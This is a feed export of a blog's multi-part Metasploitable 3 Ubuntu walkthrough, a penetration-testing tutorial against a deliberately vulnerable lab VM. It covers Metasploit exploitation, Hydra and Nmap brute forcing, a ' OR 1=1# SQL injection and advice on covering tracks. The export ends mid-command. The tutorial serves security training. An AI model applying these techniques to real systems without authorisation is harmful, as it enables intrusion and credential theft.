tag:blogger.com,1999:blog-63963096173709944332024-03-27T17:16:44.290-07:00The Trembling UterusAdvanced ethical hacking, Kali Linux and general security tutorials.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.comBlogger110125tag:blogger.com,1999:blog-6396309617370994433.post-88314496865699144372020-11-18T06:12:00.000-08:002020-11-21T04:35:59.880-08:00Metasploitable 3 Ubuntu Walkthrough: Part VII<h2>Exploiting Port 6697 – Unreal IRCd</h2><p>This service was already exploited in <a title="Metasploitable 2" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-ix.html">Metasploitable 2</a>. But is it the same version?<p><a href="https://drive.google.com/uc?id=1vn4zYybTJ1G1n3LC5ihtuVIvBI0jQ1gS" target="_blank"><img width="822" height="199" title="Service detection using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Service detection using Nmap" src="https://drive.google.com/uc?id=1mEGwa-tjB6JJZMjTDIDYynK-Icy8RH9F" border="0"></a><p>It is not possible to determine the specific version running on Metasploitable3 but because there is only one exploit available in MSF, we better try it.<p><a href="https://drive.google.com/uc?id=1DrKGVZb0mgeHStU00f_KrLu5ajiRe0B9" target="_blank"><img width="816" height="175" title="MSF exploit module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF exploit module" src="https://drive.google.com/uc?id=1E7JYuedn7vYNI2A8JJWNGmD7gR8tOxJt" border="0"></a><p>Like before, this is a very easy exploit:<p><a href="https://drive.google.com/uc?id=1Q9bBC5haHRMtML9UIvuzKcIVsrCdOycV" target="_blank"><img width="806" height="348" title="Exploiting Unreal IRCd using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Unreal IRCd using Metasploit" src="https://drive.google.com/uc?id=1pBdkTXQWR3Jj9_v66qNWhF0PZnflU7uh" border="0"></a><p>This is a low privilege shell because boba_fett is not part of the sudo group. But he is also part of the <strong><em>docker</em></strong> group…<h2></h2><a name="more"></a><h2></h2></p></p></p></p></p></p></p><a href="http://tremblinguterus.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough.html#more"></a>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com5tag:blogger.com,1999:blog-6396309617370994433.post-29770888540931368642020-11-18T05:53:00.000-08:002020-11-21T04:36:33.799-08:00Metasploitable 3 Ubuntu Walkthrough: Part VI<h2>Exploiting Port 631 – CUPS</h2><p>The Metasploitable 3 VM is running the C Unix Printing System (CUPS) with the web-based interface enabled:<p><a href="https://drive.google.com/uc?id=1IcJx90l5okQkegErUlTNotBAR3G1-nII" target="_blank"><img width="764" height="395" title="CUPS web interface" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="CUPS web interface" src="https://drive.google.com/uc?id=1QUcwtdRFW23UKN6bXnBOHXtCndqE6vWj" border="0"></a><p>A remote attacker can exploit CUPS to execute arbitrary commands via crafted fields during the creation or modification of a printer. The 'PRINTER_INFO' and 'PRINTER_LOCATION' fields can be configured to contain arbitrary commands which will be executed when a print job is submitted, provided the remote host is running a vulnerable version of Bash.<p>Searching in MSF you will find one exploit for this service:<p><a href="https://drive.google.com/uc?id=1ZUODNzOkHISON-uus7q-3WfsbLkyQFge" target="_blank"><img width="806" height="142" title="CUPS exploit in MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="CUPS exploit in MSF" src="https://drive.google.com/uc?id=1HOWnhPpzouNqcaU_1apJzXOJVckJs9A9" border="0"></a><p>Let’s use it:<p><a href="https://drive.google.com/uc?id=1GfysRZgEryzOtDcr_H1HRJy7etSEUV3u" target="_blank"><img width="806" height="303" title="Exploiting CUPS using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting CUPS using Metasploit" src="https://drive.google.com/uc?id=1bvd8ROYbrhmYt9UcszeKYIeshIOJ4EKG" border="0"></a><p><a name="more"></a><p>The exploit fails due to a configuration error in the Metasploitable 3 VM. You can read about the details here:<p><a href="https://github.com/rapid7/metasploitable3/issues/459">https://github.com/rapid7/metasploitable3/issues/459</a><p></p></p></p></p></p></p></p></p></p></p></p><a href="http://tremblinguterus.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough_18.html#more"></a>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com3tag:blogger.com,1999:blog-6396309617370994433.post-1091241017865524752020-11-15T04:21:00.000-08:002020-11-21T04:37:09.954-08:00Metasploitable 3 Ubuntu Walkthrough: Part V<h2>Port 137 (UDP) – NetBIOS Name Service</h2><p>The name service operates on UDP port 137. Usually, not exploitable but useful for enumeration purposes.</p><h3>Enumerating NetBIOS with NBTScan</h3><p>NBTScan is a command line tool used for scanning networks to obtain NetBIOS shares and name information. It can run on both Unix and Windows and ships with Kali Linux by default.</p><p><a href="https://drive.google.com/uc?id=1EwUesyblrYCri2XhSkPZFfy6ZMBL9_Ub" target="_blank"><img width="756" height="521" title="Enumerating NetBIOS with NBTScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating NetBIOS with NBTScan" src="https://drive.google.com/uc?id=1f9jFYlZgP7tgE2h8i_IbMsOrlfTWCmvi" border="0"></a><p>In this case, not a lot of information but always better than nothing.<h3></h3><a name="more"></a><h3>Enumerating NetBIOS with Nmap</h3><p>Nmap contains a script that we can also use to discover NetBIOS shares. This has the advantage that it can be ran with other NSE scripts, ultimately saving time when enumerating many different things on a network.<p><a href="https://drive.google.com/uc?id=1q1607AW1FDxNc513hZMYrQTpZkWTmxIC" target="_blank"><img width="796" height="277" title="Enumerating NetBIOS with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating NetBIOS with Nmap" src="https://drive.google.com/uc?id=1YsfmsE988xf9hfuEO2dLQn7BIp9cqqCy" border="0"></a><h3></h3></p></p></p></p><a href="http://tremblinguterus.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough_15.html#more"></a>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com68tag:blogger.com,1999:blog-6396309617370994433.post-58198893015798165372020-11-12T09:41:00.000-08:002020-11-21T04:31:45.309-08:00Metasploitable 3 Ubuntu Walkthrough: Part IV<h2>Exploiting Port 80 – Apache Server</h2><p>Let’s start by getting as much information as possible about the remote website. Let’s try getting some additional information with Metasploit:<p><a href="https://drive.google.com/uc?id=1xX0-no_MvxqbB7qJkvxwCOKGajfNV1ZZ" target="_blank"><img width="541" height="230" title="Enumerating Apache Server using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Apache Server using Metasploit" src="https://drive.google.com/uc?id=12HjzX_oa-MiYCVcSq5RJc56vXiArTdYU" border="0"></a><p>There is something interesting here; the <b><em>/cgi-bin/</em></b> directory. Is there any exploit for this?<p><a href="https://drive.google.com/uc?id=12j92C-Ejz-g3c55jCKhWqtq00aS1KpiH" target="_blank"><img width="833" height="305" title="Looking for an exploit in the ExploitDB" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Looking for an exploit in the ExploitDB" src="https://drive.google.com/uc?id=1bv3MGfNy25_Scg3QRQ4dE0KGuEtKvkl4" border="0"></a><p>There is a Metasploit module to exploit his vulnerability:<p><a href="https://drive.google.com/uc?id=1bX0_X36juCM1C4jY83xK9pu514woTxE8" target="_blank"><img width="806" height="191" title="Exploiting Apache Server using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Apache Server using Metasploit" src="https://drive.google.com/uc?id=1-LWLaWgK49YdUc1st5bsALoc8uNRBaub" border="0"></a><p>Another failed attempt. This was supposed to work, but it didn’t…<h2></h2><a name="more"></a><h2>Exploiting Port 80 – WebDAV</h2><p><a name="_Toc56069271">Let’s get more information about the target using Directory Buster:</a><p><a href="https://drive.google.com/uc?id=1BJEKV-3ZSE8hhD2BM3Ni-hS6dYMMFxBT" target="_blank"><img width="608" height="396" title="Enumerating using Directory Buster" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating using Directory Buster" src="https://drive.google.com/uc?id=1oZOKFpLJQ0GmvxmkwjS6h4t260g1usT1" border="0"></a><p><a href="https://drive.google.com/uc?id=1MMv3tzPtcJeNvB-LWpTEOlo2efmmeSF9" target="_blank"><img width="608" height="340" title="Enumerating using Directory Buster" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating using Directory Buster" src="https://drive.google.com/uc?id=1fULPbVzsfMDqowQXjCAqNwvV-H_T2bf2" border="0"></a><p>The <b><em>uploads</em></b> directory appears to be promising. But is it writable? Let’s check it out. You can do WebDav Enumeration using Metasploit.<p><a href="https://drive.google.com/uc?id=1aFiKRaJVcUnv6_412cWeav-4KrU7jayg" target="_blank"><img width="806" height="365" title="Testing WebDAV using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Testing WebDAV using Metasploit" src="https://drive.google.com/uc?id=1wLkW_q0zijkQt1-bAY-LZ_3c1Zmw7_-s" border="0"></a><p>As you can see, the <em><b>uploads</b> </em>directory is writable and a number of different file formats can be uploaded over there.<p>From here you need to create a payload, deploy it, set up a listener, execute the payload and you will have a shell…!<p>For detailed step-by-step instructions using multiple tools and options, please check my other <a title="Metasploitable 3" href="https://tremblinguterus.blogspot.com/2020/11/metasploitable-3-windows-walkthrough.html">Metasploitable 3</a> tutorial.<p><br></p><p><p><a title="Metasploitable 3 Ubuntu Walkthrough: Part V" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough_15.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com3tag:blogger.com,1999:blog-6396309617370994433.post-23135370418564604282020-11-12T04:24:00.000-08:002020-11-21T04:30:12.967-08:00Metasploitable 3 Ubuntu Walkthrough: Part III<h2>Exploiting Port 80 – Drupal</h2><p>Drupal is a free and open-source web content management framework written in PHP and distributed under the GNU General Public License.<p>When browsing port 80 with Firefox, Apache will present you with a directory listing containing a number of entries:<p><a href="https://drive.google.com/uc?id=1CWcXd0C4lH4hfFfNnD9JDMadna0pPorf" target="_blank"><img width="457" height="331" title="Port 80 directory listing" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Port 80 directory listing" src="https://drive.google.com/uc?id=1Jbe_Vt0FerS1zJzqf2ko-z1eCHIU7aXG" border="0"></a><p>If you go back to the OpenVAS report, you will see a lot of potential on port 80:<p><a href="https://drive.google.com/uc?id=1Ei2kSkRuYz4m7i2sb0y7zePoOc_sirTH" target="_blank"><img width="806" height="173" title="OpenVAS list of port 80 services vulnerabilities" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS list of port 80 services vulnerabilities" src="https://drive.google.com/uc?id=1Y1A63D-cT_olxobf64Gu134KLaJuALMZ" border="0"></a><p>The first thing to do should be to identify Drupal’s version. Analyzing the source code for the Drupal page you can immediately get some information about the website’s structure, namely the fact that many things are coming from the <b><em>drupal/modules</em></b> folder.<p><a href="https://drive.google.com/uc?id=1yn9bpy3ryOSfkuk8ribXl1SPAs0TvvR0" target="_blank"><img width="806" height="321" title="Drupal webpage source code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Drupal webpage source code" src="https://drive.google.com/uc?id=1zEGmLIW0Hf_atTOC1tH5d4S_m8FqaW9S" border="0"></a><p>Digging and researching online will lead you to the discovery of the<strong><em> blog.info</em></strong> file located inside the <b><em>drupal/modules/blog</em></b> folder.<p><a href="https://drive.google.com/uc?id=1KXLWUzXpOxqmE1LVIT6Oss0x54a7U87f" target="_blank"><img width="806" height="400" title="Drupal version" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Drupal version" src="https://drive.google.com/uc?id=1PKFzB7wg7tRD0qdNAUGakjnRgUQol-fz" border="0"></a><p>Now you know Drupal is version 7.5<h3></h3><a name="more"></a><h3>Exploiting Drupal using Metasploit</h3><p>Searching inside MSF, you will find there are several modules available to use against Drupal:<p><a href="https://drive.google.com/uc?id=1OXS6PCgQR2_RZ3BirjgRneA1yMYogkGR" target="_blank"><img width="806" height="181" title="List of Metasploit modules for Drupal" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="List of Metasploit modules for Drupal" src="https://drive.google.com/uc?id=12ELfQJtjzsrlxwC6zRQhBlBgTYl7tE4s" border="0"></a><p>Comparing this list with the vulnerabilities identified by OpenVAS will tell you exploits 2 and 3 are probably going to succeed.<p>Let’s try to exploit the SQL Injection vulnerability:<p><a href="https://drive.google.com/uc?id=13Ls_7Z3m3--yUs5UqwASl_ai6nPjcp5R" target="_blank"><img width="806" height="253" title="Exploiting Drupal using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Drupal using Metasploit" src="https://drive.google.com/uc?id=1EyAmpa8by6paEdubGRglP7Se3p858ZN-" border="0"></a><p>This is a low privilege session…<p><b>NOTES: </b><ul><li>The targeturi was set to /drupal/ instead of root (/) because that is the Drupal directory on the Apache web server.</li><li>This exploit is supposed to work only against Drupal 7.0 and 7.31 (the vulnerability was fixed in 7.32). The server apparently has version 7.5 and is still vulnerable. </li></ul><p>Now let’s try to exploit the remote code execution vulnerability: <p><a href="https://drive.google.com/uc?id=1ndWRukjtmpR59j_MZTmLwMGN1Ex_FWx1" target="_blank"><img width="806" height="225" title="Exploiting Drupal using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Drupal using Metasploit" src="https://drive.google.com/uc?id=1toJ6ojbSi-WzV81pV44YlLMfqycVLwPx" border="0"></a><p>And this is another low privilege shell…<h2>Exploiting Port 80 – Payroll Application</h2><p>Another interesting item is the file <b><em>payroll_app.php</em></b>. Clicking on it will load a <b><em>Payroll Login</em></b> interface.<p><a href="https://drive.google.com/uc?id=1Ir2kCNtSaurDo5-wa1vrgDewI4eLH6xZ" target="_blank"><img width="531" height="358" title="Payroll Login" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Payroll Login" src="https://drive.google.com/uc?id=1L2s7vA6-06yTzo5iVwhZKaWHEhduSw8o" border="0"></a><p>The Nmap scan identified a MySQL server running on Metasploitable3. Therefore, it might be a good idea to try a basic SQL injection attack. Let’s use the classic <b><em>' OR 1=1#</em></b>.<p><a href="https://drive.google.com/uc?id=1gtzyO6kbjbaR0aH8RwDdvBkWEOWTGniL" target="_blank"><img width="396" height="242" title="Trying basic SQL injection" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Trying basic SQL injection" src="https://drive.google.com/uc?id=1fhM8Jp71Rvs24CRTZuQkRWQ-Bo5jxTAD" border="0"></a><p>Clicking the Ok button with the classic injection string in the User input box will immediately reveal a total of 15 users in the Payroll App.<p><a href="https://drive.google.com/uc?id=1E0Y0V-8Tp_HHBgjfUBEmGibCrdYYyC44" target="_blank"><img width="469" height="763" title="Successful SQL injection" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Successful SQL injection" src="https://drive.google.com/uc?id=1W6Fhd4_bdPo7mZO6jAJ2l36gQBs2f4Yj" border="0"></a><p>This could be the beginning of a real SQL Injection attack but instead I went after the code for the Payroll app. I remembered the file was listed in a previous exploit, namely ProFTPD. So, I repeated the exploit and investigated the contents of the file <b><em>payroll_app.php</em>.</b><p><a href="https://drive.google.com/uc?id=1EN6VkiMB1p8klMWfOmEZFeHHmw0j-PKw" target="_blank"><img width="806" height="260" title="Credentials inside the payroll_app.php file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Credentials inside the payroll_app.php file" src="https://drive.google.com/uc?id=1MqwMCf08NvJDvQEYJsKN_Pj6XhkhegA4" border="0"></a><p>These appear to be the credentials for the Payroll application but they are not…<p><a href="https://drive.google.com/uc?id=1r3CP-oeDkeKhApCAeCr3BAQkaZJ-rgso" target="_blank"><img width="505" height="254" title="Payroll failed logon" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Payroll failed logon" src="https://drive.google.com/uc?id=1ETRprCLC7xQ18BqKwCvVgxPPO5-S4GYg" border="0"></a><p>However, let’s not forget about these credentials as they might still be useful. <h2>Exploiting Port 80 – phpMyAdmin</h2><p>Opening the phpMyAdmin link will take you to the service login page:<p><a href="https://drive.google.com/uc?id=16S7A2hBlmC9TFA4qdfukGQZyh4SMsczG" target="_blank"><img width="439" height="499" title="phpMyAdmin login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="phpMyAdmin login page" src="https://drive.google.com/uc?id=1SaPLZiBotkb2-xZy22-GcI8-g_tCiC8R" border="0"></a><h3>Brute forcing phpMyAdmin using Hydra</h3><p>Brute forcing this service requires a bit of research but nothing special. You can use the wordlists provided with Kali, or you can add the previous credentials to the customized wordlists.<p><a href="https://drive.google.com/uc?id=1hptWXjAukLMpj0vIE1ZR8qKp_CbeYhDT" target="_blank"><img width="806" height="168" title="Brute forcing phpMyAdmin using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing phpMyAdmin using Hydra" src="https://drive.google.com/uc?id=1dQDnprQuq2BljsTgX1nAAZJuZLQml265" border="0"></a><h6></h6><p>The credentials are valid for the phpMyAdmin service!<h3>Brute forcing phpMyAdmin using Metasploit</h3><p>There is a scanner module to use against phpMyAdmin but it’s broken and therefore completely useless:<p><a href="https://drive.google.com/uc?id=1hGpRP1f34M2gmjZH-iUuC-nD3ifiZYEQ" target="_blank"><img width="808" height="445" title="Brute forcing phpMyAdmin using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing phpMyAdmin using Metasploit" src="https://drive.google.com/uc?id=1gAmYhcJHK68-6tpBl1F9Pfo_FYdwJIQO" border="0"></a><h3>Exploiting phpMyAdmin using Metasploit</h3><p>The phpMyAdmin web application running on Metasploitable 3 has a remote code execution vulnerability which can be exploited using the <b><em>phpmyadmin_preg_replace</em> </b>module:<p><a href="https://drive.google.com/uc?id=1Qg0UmM12tIrhfmzK0c8K8HwUK-Ng34ox" target="_blank"><img width="806" height="309" title="Exploiting phpMyAdmin using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting phpMyAdmin using Metasploit" src="https://drive.google.com/uc?id=10r8giYkB897vxoFSyNUg036n4-SyWPq-" border="0"></a><p>Unfortunately, something went wrong with this exploit. It might be a simple thing but I decided not to waste time investigating it. Instead, I tried to use the previously collected credentials…<p><a href="https://drive.google.com/uc?id=14DeIlenunRMW8Dj0_ybKOu42CyF1rUm-" target="_blank"><img width="806" height="292" title="Exploiting phpMyAdmin using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting phpMyAdmin using Metasploit" src="https://drive.google.com/uc?id=1FcIyMtiJjsyjYioHS8hrEFE0-cUd3wp7" border="0"></a><p>It worked! The created session is a low privilege one, but this means the credentials are valid for phpMyAdmin. Therefore, instead of using them inside MSF, why not use them directly in the phpMyAdmin login page?<p><a href="https://drive.google.com/uc?id=1AsQ3c1Hicvq0dQvq2bKfw4j10cCNac2h" target="_blank"><img width="806" height="387" title="Inside the phpMyAdmin dashboard" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Inside the phpMyAdmin dashboard" src="https://drive.google.com/uc?id=1QWRvNsoV_zYrM9OsBNjAL4lOft7K4w0f" border="0"></a><p>From here, everything is your disposal. Take a look at the <b>users</b> table inside the <strong><em>payroll</em></strong> <b>database</b>:<p><a href="https://drive.google.com/uc?id=1R2niOsr2_7UwG28F4Bmzcj7DpYeR7U3x" target="_blank"><img width="798" height="535" title="The payroll database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The payroll database" src="https://drive.google.com/uc?id=1MYjquVqXpIkI84qqaP5_rS4H201Mqgg6" border="0"></a><p>You still need to get root access to the target, so why don’t you add all this information to your user/pass custom wordlists and try to brute force SSH again?<p><a href="https://drive.google.com/uc?id=1P7aWS6ABtGWfdgRjB-wQtgnrFjClO9S3" target="_blank"><img width="792" height="607" title="Brute forcing SSH with the new credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with the new credentials" src="https://drive.google.com/uc?id=1XR9I_cb8S6NtK2YklAQjoFDo7E0vFL04" border="0"></a><p>It works! All these accounts have SSH access and on top of that, Leia, Luke, and Han all have <b><em>sudo</em></b> privileges so some of these sessions have root access to the target machine.<p><br></p><p><p><a title="Metasploitable 3 Ubuntu Walkthrough: Part IV" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-ubuntu-walkthrough_69.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com1tag:blogger.com,1999:blog-6396309617370994433.post-33163329331771029022020-11-10T11:06:00.000-08:002020-11-21T04:29:16.202-08:00Metasploitable 3 Ubuntu Walkthrough: Part II<h2>Exploiting Port 21 – ProFTPD</h2><p>The FTP service can potentially be exploited in several ways. Let’s try a few of them. Users can access the Metasploitable VM by logging into the FTP server with a valid set of credentials. Therefore, it is a good idea to try get access to this service. Pay attention to the results you got from OpenVAS:<p><a href="https://drive.google.com/uc?id=1xyL58PSn50Yb5JKXuanYw92QiyGMW6nS" target="_blank"><img width="806" height="204" title="OpenVAS reporting ProFTPD vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting ProFTPD vulnerability" src="https://drive.google.com/uc?id=1LxtCDiEvwhcZTYEljmK0tcMyckvGI7Z1" border="0"></a><h3>Brute forcing ProFTPD using Hydra</h3><p>Kali Linux has a number of wordlists that can be used for this purpose. Let’s use Hydra to launch an attack:<p><strong><em>hydra -L [users file] -P [passwords file] [IP] [service]</em></strong><p><a href="https://drive.google.com/uc?id=1LNozWKwRUIY9ZdMhSRc1o9Phy6IwJOav" target="_blank"><img width="806" height="219" title="Brute forcing ProFTPD using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ProFTPD using Hydra" src="https://drive.google.com/uc?id=1jR64vW862fptuQyvDvg6YubAeGgRhaYa" border="0"></a><p>This will take a very long time because the tool will try every password for each user. And it might not return any good results unless you use carefully selected wordlists.<h3></h3><a name="more"></a><h3>Brute forcing ProFTPD using Nmap</h3><p>Using wordlists provided with Kali, and using the proper Nmap script (<b><em>ftp-brute</em></b>) you will also get positive results and sometimes faster than you what can get using Hydra.<p><a href="https://drive.google.com/uc?id=1KjqSgEXrDLLiZnSfBjyWJcIw3RL4b2j0" target="_blank"><img width="806" height="235" title="Brute forcing ProFTPD using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ProFTPD using Nmap" src="https://drive.google.com/uc?id=111IlgPTM3eLXPtv97drLoECOcFn1vlvL" border="0"></a><h3>Brute forcing ProFTPD using Metasploit</h3><p>Metasploit has an auxiliary module that can also be used to brute FTP force passwords just like Hydra did. I like to use it last with custom wordlists.<p><a href="https://drive.google.com/uc?id=1i9YXOSDRvm-ZADrzICA5g1fuK6lEjjf8" target="_blank"><img width="806" height="229" title="Brute forcing ProFTPD using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ProFTPD using Metasploit" src="https://drive.google.com/uc?id=18cHfymXq2uHcnjmjLEik1s985BfuaiyA" border="0"></a><p>Using the custom wordlists previously created will produce the same results. But using Metasploit has a major advantage over Hydra because the credentials found are automatically added to the database.<p><a href="https://drive.google.com/uc?id=1Hsx5oIjYir8lsRRBBVMV7uIqPA-8Hl4I" target="_blank"><img width="688" height="123" title="MSF database with found credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF database with found credentials" src="https://drive.google.com/uc?id=1mizxxG1iiczgFMc1YEG5_0qOMaw5rWjy" border="0"></a><h3>Enumerating via ProFTPD</h3><p>Once you have found a valid credential set, you can use it to login to the remote FTP server:<p><a href="https://drive.google.com/uc?id=1XiJXtt5z2axO0IeYyXKzu-QJiI8V5BDI" target="_blank"><img width="782" height="674" title="Enumerating via ProFTPD" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating via ProFTPD" src="https://drive.google.com/uc?id=1b78xDvZDRo0iKTYMd-NQP1I0V8Jo0lDN" border="0"></a><p>You have now a list of the systems’ users and you can explore further to get extra data.<h3>Exploiting ProFTPD using Metasploit</h3><p>If you look closely at the OpenVAS scan results, you will see this:<p><a href="https://drive.google.com/uc?id=1SjGk5wNCOd4UMN7p38FGyMPk4-Zbi0L7" target="_blank"><img width="806" height="38" title="OpenVAS reporting ProFTPD vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting ProFTPD vulnerability" src="https://drive.google.com/uc?id=1ZPM290C5pX6oAJ5Zq29duc7p1lGUgH6k" border="0"></a><p>Searching for an exploit in MSF will return these results:<p><a href="https://drive.google.com/uc?id=1dbbD7NJ-NpKNvOtUm5lDSkz0HMNIKUXA" target="_blank"><img width="806" height="199" title="Searching for and exploit in MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Searching for and exploit in MSF" src="https://drive.google.com/uc?id=1zFHOgnYyBFsg5nuv0s1Fazgin9D0mOaP" border="0"></a><p>As you can see, there a specific module for this vulnerability. Use it!<p><a href="https://drive.google.com/uc?id=18mHk9751gdPkC2xGvNUbmnP9bkBVLkB1" target="_blank"><img width="806" height="305" title="Exploiting ProFTPD using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting ProFTPD using Metasploit" src="https://drive.google.com/uc?id=1QTH7U7TQWWedOSAGnhBiE-WTExBWX0be" border="0"></a><p>This exploit gained remote access as the <b><em>www-data</em></b> user. Not very useful but always better than nothing, right?<p>Don’t forget to clean your tracks by removing the payload used.<p><a href="https://drive.google.com/uc?id=1qRuJbQtk8b3pr94_ZidBgWryoT8IArSw" target="_blank"><img width="806" height="419" title="Deleting the PHP payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deleting the PHP payload" src="https://drive.google.com/uc?id=1T3Ghznt4T0f06LrP9Rg_rMK7q8sEZSWS" border="0"></a><h2>Exploiting Port 22 – SSH</h2><p>This port/service can also be attacked using the usual tool of the trade. Besides, keep in mind that sometimes it will be easy to get credentials for other running services. Then, using the previously identified credentials it is easy to create a small custom list of usernames and passwords and attempt to get more using the usual tools.<p><a href="https://drive.google.com/uc?id=1aEcn70qnc12HWvUUyJ3yA3goGHQmV-zY" target="_blank"><img width="806" height="202" title="OpenVAS reporting SSH vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting SSH vulnerability" src="https://drive.google.com/uc?id=17pr5J7llzL1zkM8pRLZLirYv_MObLiHr" border="0"></a><h3>Brute forcing SSH using Hydra</h3><p>Basically, the same as before, but this time much slower due to limitation in SSH.<p><a href="https://drive.google.com/uc?id=1lHBLUBOliBGVeQTNJF9oz_ECJG6PfAEu" target="_blank"><img width="806" height="159" title="Brute forcing SSH using Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Hydra" src="https://drive.google.com/uc?id=1ADCgWuwOS9OoBy_RseQ5mTObYvvj2UF_" border="0"></a><h3>Brute forcing SSH using Nmap</h3><p>Using Kali’s wordlists, you will get some results. <p><a href="https://drive.google.com/uc?id=1NRFO_uQDx-QOqEtoepe6tXtcDJ03ZJ22" target="_blank"><img width="806" height="109" title="Brute forcing SSH using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Nmap" src="https://drive.google.com/uc?id=1yEAucJirvKkT807JhmGUU3nkgjytYZbR" border="0"></a><p><a href="https://drive.google.com/uc?id=1JGyo-TpU_U1gjxXN_Z1jIG6RukrZttZZ" target="_blank"><img width="806" height="128" title="Brute forcing SSH using Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Nmap" src="https://drive.google.com/uc?id=15uVcgWHZhroVa0GijwfDGcmsKV0U3OpZ" border="0"></a><h3>Brute forcing SSH using Metasploit</h3><p>Now that you have at least one valid credential, it might be a good idea to use it in Metasploit. Each successful login will immediately open a session on the remote machine and the valid credentials are added to the MSF database.<p><a href="https://drive.google.com/uc?id=1BvJD3Awu6OZqr0QUoKp8nB7zePufB3Qb" target="_blank"><img width="806" height="497" title="Brute forcing SSH using Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH using Metasploit" src="https://drive.google.com/uc?id=1C7RqRpNCntECbeau3srStjuVGiBe2Uei" border="0"></a><p>You will get a command session and you can upgrade it to a Meterpreter session!Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-49310360949710581622020-11-10T10:35:00.000-08:002020-11-21T04:27:52.135-08:00Metasploitable 3 Ubuntu Walkthrough: Part I<p>Metasploitable3 is a Ubuntu 14.04 VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with Metasploit. Not every type of vulnerability on Metasploitable3 can be exploited with a single Metasploit module, but some can.<h2>Network Setup</h2><p>To conduct these exercises, you need to have 2 machines. One computer is used for attacking, the second computer is used as the victim. Using virtual machines is always the best solution for training purposes so in the following examples a Kali Linux VM and a Metasploitable 3 VM connected to a Virtual Box internal network with a router between the two VMs.<p>To change the settings of the Metasploitable 3 VM just follow the normal procedure to configure network interfaces in Linux. Besides, the VM might have some IPTables rules being enforced.<p><a href="https://drive.google.com/uc?id=1D-JcUemSUIyXFvPDJyK6z-jF55e3ba3u" target="_blank"><img width="607" height="499" title="Metasploitable 3 Ubuntu IPTables" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploitable 3 Ubuntu IPTables" src="https://drive.google.com/uc?id=1UHCyhJfsHr4035vnOaV9qwi_GNM-Fub6" border="0"></a><p>Having the firewall turned off from the start will allow you to get complete scan results.<p>But if you decide to attack this VM with the firewall on, turning it off could be one of the first tasks. Or you can get a shell and then create an SSH tunnel that will allow you to bypass the firewall.<p>Resetting can be easily achieved using the following command:<ul><li>sudo iptables --policy INPUT</li><li>sudo iptables --policy 